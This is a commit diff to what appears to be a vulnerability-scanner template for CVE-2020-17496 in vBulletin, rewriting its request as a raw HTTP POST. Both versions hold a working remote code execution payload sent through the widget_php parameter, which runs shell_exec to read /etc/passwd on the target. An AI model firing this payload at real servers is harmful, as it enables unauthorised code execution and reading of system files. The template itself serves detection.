Update CVE-2020-17496.yaml
parent
40f751fa4d
commit
73c5f9e8cd
|
@ -6,11 +6,13 @@ info:
|
||||||
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
|
||||||
tags: cve,cve2020,vbulletin
|
tags: cve,cve2020,vbulletin
|
||||||
requests:
|
requests:
|
||||||
-method: POST
|
- raw:
|
||||||
path:
|
- |
|
||||||
-"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel"
|
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
|
||||||
body: |
|
Host: {{Hostname}}
|
||||||
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
|
|
||||||
|
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
-type: regex
|
-type: regex
|
||||||
|
|
Loading…
Reference in New Issue